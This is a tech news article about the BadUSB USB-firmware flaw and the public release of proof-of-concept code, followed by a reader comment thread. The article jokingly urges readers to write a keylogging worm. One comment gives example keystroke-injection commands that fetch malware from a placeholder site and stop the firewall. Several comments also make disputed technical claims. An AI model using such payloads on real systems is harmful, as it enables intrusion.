Back in July, we wrote about a massive security hole — BadUSB — that potentially gave hackers the ability to hijack or subvert billions of USB devices, from keyboards to printers to thumb drives. At the time, due to the severity of the issue, the researchers who discovered the flaw didn’t publish their BadUSB exploit code. Now, however, two other hackers have worked out how to exploit BadUSB — and they’ve published their code on Github for all to see. The pressure is now on device makers to actually fix the flaw before millions of users have their USB devices and peripherals exploited — which is a problem, because there’s really no easy fix for BadUSB.

For the full low-down on BadUSB, I suggest you read our original story from July. In short, though, every USB device has a microcontroller — a small chip that acts as an interface between the device (a keyboard, a flash drive) and the host (your PC). This chip often has software (firmware) that can be reprogrammed to do nefarious things, such as logging your keystrokes, infecting your PC with malware, or something much worse. BadUSB is highly dangerous for one key reason: It’s very hard to detect, even for virus scanners.

A code fragment from the reprogrammed firmware

The guys who originally discovered BadUSB — Karsten Nohl and friends at SR Labs — announced that the bug’s existence in July, and presumably shared more details with device makers and the USB Implementers Forum, but they did not share actual proof-of-concept code for fear that other, slightly-less-benevolent hackers would use this zero-day vulnerability for nefarious purposes. Now, however, two hackers at Derbycon in Kentucky have discovered the same BadUSB flaw — and, more importantly, they’ve published their proof-of-concept on Github. If you know what you’re doing, you can grab the code and start exploiting USB devices straight away. Go wild: The first person to write a self-replicating worm that key logs passwords and other sensitive data stands to make millions — nay, billions — of dollars.

The two security researchers — Adam Caudill and Brandon Wilson — justified their release to the Derbycon audience with the following: “The belief we have is that all of this should be public. It shouldn’t be held back. So we’re releasing everything we’ve got. This was largely inspired by the fact that [SR Labs] didn’t release their material. If you’re going to prove that there’s a flaw, you need to release the material so people can defend against it.” Their rationale, while somewhat reckless, isn’t entirely misguided: BadUSB is potentially a huge issue, and someone needs to light a fire under the collective derriere of USB device makers so that they actually try to fix it. As always with vulnerabilities like this, it’s impossible to say how long it’s been used — by black hat hackers, by the NSA — before someone like Kohl, Caudill, or Wilson publicly discloses it.

The USB controller chip is the big chip in the middle (they don’t usually have a skull silkscreened onto them though).

Caudill and Wilson succeeded in reprogramming the firmware of a Phison USB microcontroller, so that when it’s plugged into a host computer it impersonates a keyboard that types whatever keystrokes the attacker wants. This hacked USB microcontroller could be inside a thumb drive, mouse, printer — it doesn’t matter. Phison is one of the world’s largest makers of USB microcontrollers — and it’s important to note that, at least as far as we know, it’s only Phison microcontrollers that have had their firmware reprogrammed by hackers. Other microcontrollers are probably vulnerable in a similar way, but no one has published any vulnerabilities… yet.

Funnily enough, using a PS/2 mouse and keyboard is actually a good idea, too.

Moving forward, the problem with BadUSB — other than the fact that it’s very hard to detect — is that it’s almost impossible to plug the hole. Short of the host (your PC) ensuring that the USB device hasn’t had its firmware meddled with — something that would require the host to check with a global database of firmware cryptographic signatures — there isn’t really a solution. Future devices could avoid using reprogrammable USB microcontrollers, instead opting for hard-coded ASICs or ROMs — but in many cases that might not be financially possible.

For the time being, the best mitigation against BadUSB and other similar exploits is to maintain good security practices: Keep your software up-to-date, don’t open any files you don’t recognize, and — a bit like safe sex — don’t plug any devices into your computer unless you know where they’ve been.

Tagged In

Some one could go buy a dozen (or 50 or a 100 for that matter) USB sticks, hack them and then sell them on Ebay for a low price/ return them to the store of purchase…leave them laying around in Starbucks so unknowing customers simply pick them up and us them…Once someone plugs it into their own PC then the Hack has complete unrestricted access to mooch data of any type.

Could be pretty nasty, of course this is small scale….but say some guys got in and are able to flash the firmware on 100k USB chips before they even left the manufacturer, that’d be ugly

Rentier

yeah, you can’t even share your stick with a friend because his computer might be infected.

Techutante

A (somewhat anarchist) friend of mine used to infect floppy disks and leave them around the school computer lab. Someone would always forget a disk at home, and low there’s a free one! Who cares, it’s not your computer! Until they take the disk home too. Or email themselves infected files.

Chesterlots

I still refuse to believe “funnily” is a word… it just sounds so weird when you try to use it casually.

http://www.mrseb.co.uk/ Sebastian Anthony

I think I even managed to use ‘funnest’ once… that was a good day.

Wierd0n3

I find it sadly impressive that they couldn’t just de-solder the Write pin from the device once the factory firmware is installed. heck, half of the motherboards i’ve bought since ’97 have had a “write protect” jumper so the bios couldnt be overwritten unless you have physical access to the case.

SumGuy954

Write pin for the firmware? If only it was clearly marked I would snipe it on all my usb sticks..

Ken B

I can see one (temporary) fix against this. A USB device you plug between host and USB storage. This proxy should not have a reprogrammable controller and only pass data between host computer and USB storage.
Basically it would be hard wired to only allow USB storage. A mouse or keyboard (or a hacked USB storage pretending to be one) would be blocked.

Now there are a whole lot of other USB devices that can’t be protected in same manner, but it’s a step in the right direction. It’s more likely you move USB storage around, than USB printers.

Come to think of it.. a reprogrammed USB keyboard controller could be even worse. It would now have unfiltered access to all your keystrokes. It would still need a way to transfer that information to the computer and out on internet. My guess: It would try send invalid scancodes that Windows would ignore but that a companion malware could pick up and transfer on the net. But this could be blocked with proper Anti-Virus/Malware software even though the keylogger feature would remain in your keyboard.

gremlin22

What is the threat exactly?
You plugged a fake keyboard into your PC. What next?
You still type your passwords on the regular keyboard the fake keyboard is completely inactive. There is a slim chance that it will be able to snoop data that goes over the USB channel on the same hub but that is really really difficult to accomplish since no USB controller is actually designed to do it. And then what should it do with the snooped data exactly? A USB device can’t access the network unless it has cellular modem within.
As far as detection goes, you can easily see an unexpected keyboard in device manager.
A fake network device could be a bit more interesting but it is even easier to detect and no sensitive traffic will go through it unless it can emulate true network.
Infecting random devices is insanely difficult and will break their normal functionality so they will be very very easy to detect.

All this USB fear mongering rides out vague memories about the way that Stoxnet used USB to infect machines. But for Stoxnet the USB devices were completely normal, it took advantage of an unknown SW vulnerability in Windows

The only thing that these researchers demonstrated is the ability to reprogram a very specific USB device in the LAB. Anyone that ever developed software for USB devices knew it is possible. But again, what exactly is the scenario that poses a security risk?

imbra

I agree completely. If I were just a little more cynical than I already am, I would only explain this story with “research lab needs more funding, so they blow this thing out of proportion to attract attention.”.

Itsthatbad

No the “fake” keyboard is just part of the total attack. There are a few devices I know of, at least 2 years old, that play a set of keystrokes back to the computer and download the malicious code that then continues the exploit and sets up the control and command links. It really is as simple as “winkey-r, iexplore http://www.malwarehere.com” sent from a keyboard on many computers to get a pc to become infected. Or… “net stop firewall” or anything you can use a keyboard for (which is more or less anything you can do via gui). And it happens very quickly. If youve never programmed macros and scripts for windows before, you might not realize that within seconds, your system is hacked. The USB device may or may not need to store any data.. just be the start of the process. And since you “typed” it, there isn’t much security to prevent it.

Tom Bayley

The threat is that an infected USB controller can issue malicious keyboard commands to get the PC to install malware stored in its own flash. This is as bad as it gets.

– The keyboard need only be registered for a second and can then disappear again without trace.
– The malware on the flash can easily be hidden from the regular filing system, and hence from antivirus software.
– The USB firmware infection can be cloaked.

– Once infected, the PC can infect the controller on any other USB device, including built-in devices like webcams.

– Antivirus can clean the PC but it can be very quickly reinfected e.g. from a built-in USB device.

Ken B

Indeed. It can act as a USB hub faking several “connected” devices, including keyboard, mouse or even a network controller.
Most likely though is opening shady web sites that can be employed with browser exploits, download and run software

Dave Mullins

It’s pretty simple. It sends a Winkey-r to open the run dialog then runs commands to load a keyboard logging program from it’s internal memory. a few days it reads the log that program created and scans it to get all your passwords. Do you want me to continue?

Magnus Blomberg

Do you need physical access to the usb device to alter its firmware or is it enough to compromize the host it’s connected to?

Does all usb co trollers have the same flaw? If not how common are the ones that do?

egil222

There are two things I don’t understand about this issue. First Don’t you need physical access to a usb device in order to compromise it as you need a eprom programmer to actually re-write the firmware. Second, at least on windows, when you plug a usb device into the machine, it puts up a message saying it is installing drivers for your new device and IDs it. Wouldn’t most people think something was wrong if they plugged in a thumb drive and then received a message saying that the machine was installing support for a new keyboard (in the case of a key logger?)

MLOTT

Some devices may load the firmware upon connection. So, if the file on the user’s regular hard drive is altered, that altered firmware would eventually be reloaded, say upon reboot.

My god what have these noobs done. No way this is going to be fixed for every device. This is the new hiv of computing. Most people can barely update their PC’s let alone their firmware. If this keeps up computers as we know it is going to be dead.

Hooper

Is it bad i pictured two big metal safes having unprotected sex?

ronch

If the flaw can’t be fixed, then what’s the point? I wish these guys just kept quiet instead of giving people who don’t have anything better to do a crazy idea.

And if it can be fixed, and they released the code to get device maker’s attention(s) and patch their products, yeah right. You think USB flash drive makers will go through all the trouble of fixing their drives’ firmware? For new units, sure, but what about the bajillions of USB flash drives out in the wild? And even if they did address all those drives, it’s unlikely non-techy folks would go through the process of updating their firmware, much less even know what the heck firmware is or how to update it without fear of losing their precious data. And what about the billions of generic, el-cheapo flash drives you buy at the flea market or given away as promotional items?

All in all, I wish they just kept all this to themselves, and tech sites like ET would just keep silent instead of spreading this even further because of news sites’ hunger for articles to run.

Ken B

Let’s not forget the limitations of this, it’s not the end of the world as we know it.
* Can BadUSB infect your computer with a virus? Generally no, it needs software already present on your computers, like malware or exploiting vulnerabilities in drivers.
* So BadUSB is mostly harmless? Well no, it can emulate basically any type of USB-product. Technically it could emulate a keyboard and mouse, start a CMD prompt and disable/damage your system, or your browser to visit/download malware.
* Can it sniff your passwords? It certainly can IF it’s your keyboard/mouse that’s infected, but to send this across internet it need to be creative. Like emulating a USB switch/router and send out network packets.
* Can a BadUSB device infect other USB devices? Not directly, it need software installed on your computer to do it. Unless it emulates and download it by faking keyboard/mouse.
* How can you protect yourself? Just detaching the BadUSB will most likely be all you need without harm to your computer. Leaving it attached is very bad.

Tom Bayley

The threat is that an infected USB controller can issue malicious
keyboard commands to get the PC to install malware stored in its own
flash. This is as bad as it gets.

Jack Hsiung

you are wrong again.

you shouldn’t call it “infected” because it does NOT infect other USB devices. it infects software on the machine its inserted into, but not onto any other hardware or usb thumb drives.

its actually a “maliciously produced” usb controller.

MadisonHJ

If someone beats the crap out of the two security researchers, I wouldn’t be surprised.

Liz Bode

After reading this article, I had a mini heart attack. Almost the whole of the human population uses USBs regularly for everything, and even promoting ‘safe sex’ in a sense with USBs will never be an adequate solution. Like previously said, many people aren’t computer literate enough to keep their computer’s software updated so asking them to think about safety and solutions when using USBs is asking a lot. I must agree with the other comments, and say that it would of probably been a better idea to keep the whole issue silent. Making it public might bring more focus on the problem to find a solution but it also has the potential to bring negative publicity which would actually lead to a greater problem in the long run. Yet, I must acknowledge that I am glad I read his article, because now I can be more cautious with USB devices myself.

BobGuy

Good for these fellows… It is really good that they don’t have custody of the Smallpox or Spanish influenza virus. Pelosi said they have to pass it so we can see what’s in it. Sometimes it is better to keep things locked up…

Jack Hsiung

way too many limitations for this to be a real threat. the same exploit can be said to any device that plugs in into a computer.

Tom Bayley

No. Other devices are not reprogrammable the way USB is. The reprogrammability allows for infection.

Jack Hsiung

you are wrong. as the article has clearly mentioned, the hack has to be programmed at the manufacturer which is extremely highly unlikely.

its not “reprogrammed” , its actually “programmed” with a virus at manufacturer.

Tom Bayley

All USB controllers are reprogrammable. There is a Youtube video of the SRLabs BlackHat presentation in which they show their code infecting a fresh USB stick. The guy is hard to understand but here is the relevant section of the demo:

the virus HAS TO ALREADY BE IN CONTROLLER CHIPS WITHIN THE USB STICK for the virus to work.

same can be said for ANY computer part. if a manufacturer programs the flash to have a virus inside, any part of your pc flash can do the same thing. your mouse can be programmed to track your movement, your keyboard can be programmed to track keys typed, and bios, can be programmed to do anything. but the requirement is, it has to be programmed/FLASHED from manufacturer or manually (physically) by a hacker.

stop spread fud please

Tom Bayley

Good to see you removed your last sentence “you lost. period”. This is not about winning or losing, it’s about the facts. If you can prove you are right then I will freely admit I’m wrong. But I have already posted evidence from the same guys who discovered this problem – so it would be good to know where you think they are wrong.

Jack Hsiung

your “evidence” is wrong because you read the fact(s) incorrectly because they intentionally presented fact however in a “misleading” way to mislead people (for profit? paid by apple?)

read my comment on the video and you’ll understand the fact and how they tried to mislead people in the wrong direction.

let me make this easy for you. this bug/hack can be said to 99% of all programmable devices and chance of it happening is almost next to nothing. no manufacture would risk their reputation for a stunt like this. PERIOD.

Tom Bayley

I saw a comment on the video but it is in Chinese and I’m sorry I can’t understand it.

No need to make it easy for me. I’ve spent 25 years as a software developer and I should be able to understand any technical explanation you can point to. Can you provide a link maybe?

Jack Hsiung

if you have ever written any code to interface software to hardware, you’d know that its impossible to write a virus that would flash ALL eeprome at run time, therefore reduce this so called “badUSB” virus to basically a “programmer error” or “manufacturer error” aka you’d ONLY get from usb manufacturers who KNOWINGLY put it in.

and 99.99999% of manufacturers don’t knowingly put virus in their hardware therefore reduce this to be almost like a hoax or perhaps these people are being paid by Apple to bad mouth anything with a usb input (since crapple phone /tablet don’t get usb at all )

Tom Bayley

I can see you’ve edited your post changing “impossible to flash eeprome at run time” to “impossible to flash ALL eeprome at run time”. So you are learning as you go, which is fine, as I am too. But in that case best not to be too cocky, huh?

USB devices these days can have their firmware in flash rather than eeprom, which clearly makes sense for a device that already has plenty of flash memory… http://en.wikipedia.org/wiki/Flash_memory_controller “Some part of the spare cells is also used to hold the firmware which operates the controller”

I have found sources that say DFU mode is not often implemented in simple thumb drives, but clearly it *is* supported in the Phison manufactured products used in the Black Hat demo, where it was claimed Phison is the largest manufacturer in the world. The reprogrammability is confirmed here: http://en.wikipedia.org/wiki/Phison

DFU mode is unique to device and require admin access so your argument is moot .. again

clearly you have NO IDEA of anything in this realm. please, please , stop spread FUD.

Tom Bayley

I’m not trying make an argument. I’m trying to get the facts straight! Sheesh! We are both just random guys on the web – why get so hot about it?

If you really want to stop FUD you should learn how to discuss things with tolerance. You become more believable that way. The only reason this has gone on so long is that you come across as immature and therefore hard to trust.

1) Changing firmware is pointless, the vulnerability involves replacing the old firmware. 2) Most USB devices have the firmware data line cut, so they are invulnerable to this hack. 3) EEPROMS vary so much between USB devices that creating a hack that gets all of them is unlikely4) Once everyone does #2 this vulnerability will disappear.

exactly mirrors what i tried to explain to you. so , just admit you were misinformed and get this over with.

Tom Bayley

You are quoting from some random guy who commented on an article about BadUSB?

Point 1) seems irrelevant.
Point 2) is ridiculous – USB requires the data lines to be intact or else no data can be transferred.
Point 3) is kind of valid, but you don’t need to cover ALL the devices, just a significant number. And a lot of different devices contain the same code from a small number of major suppliers (including Phison.)
Point 4) I think he really means removing or disabling the DFU mode, which is the kind of thing the Black Hat presenters recommended.

I will admit this is not as serious as it has been billed, but clearly there IS a mechanism here that can pose a threat. And you have been denying that, which I think is too complacent.

Jack Hsiung

1. totally relevant and reverb with what i’ve been trying to point it out… the vulnerability is a firmware flash which comes directly from manufacturer therefore does not spread to other usbs
2. you are wrong … again.. i don’t think you get it.. its firmware dataline, not usb dataline
3. you are wrong again and again. rarely if at all do usb devices contain same code, even from same manufacturer. Phison is the only one affected and its only in 1 of its usb line that the virus actually spreads.
4. no he meant that if we disable reprogrammability/cut data line after firmware is implemented into the thumbdrive, then ppl can no longer manipulate its firmware.

clearly there is a mechanism to post a threat to ONLY SINGLE PRODUCT IN A SINGLE MANUFACTURER.

Jack Hsiung

talk about immature…you are the one being immature with your FUD..

your very first comment is blatant false “No. Other devices are not reprogrammable the way USB is. The reprogrammability allows for infection.”

reprogrammability is not allowing for infection.

i was only trying to correct you but you weren’t listening.

period. you were wrong. just admit it and stop further fudding

ryansssss

Just develop a piece of code that prevents Phison-controlled devices from mounting. Boom!

RobF

People here seem to think this is a non-problem, but I can imagine a few scenarios without much trouble why this is a big deal. For example, I would never use one, but people, especially including school children, use library computers (public or school) to do work with USB drives. Business centers in hotels, you name it, could be a way for someone to circulate key loggers, not only on the public pc, but then on any pc that the victim takes his USB device to subsequently. Also, not cool for the exploit details to be made public. Yes, they lit a fire under the equipment makers, but that’s like saying an arsonist is
absolved because he showed home owners that their house needs fire protection
by setting it on fire!

I’m with the guys about just getting devices with disabled write lines to the USB device firmware. I mean, really, who has ever had to flash their keyboard or memory stick? That prevents the spread from PC to USB device. As far as preventing a USB sleeper device from sending commands to the PC requires a far more complicated system to, at a minimum, read the firmware, check it against known good or known bad signatures, and then disable it somehow. I guess they could be sold blank and rely on the OS to burn them the first time, like the OS identifies the drivers for a new device, then blow a fuse to prevent further changes… Nahhh…

ExtremeTech Newsletter

Subscribe Today to get the latest ExtremeTech news delivered right to your inbox.

Use of this site is governed by our Terms of Use and Privacy Policy. Copyright 1996-2016 Ziff Davis, LLC.PCMag Digital Group All Rights Reserved. ExtremeTech is a registered trademark of Ziff Davis, LLC. Reproduction in whole or in part in any form or medium without express written permission of Ziff Davis, LLC. is prohibited.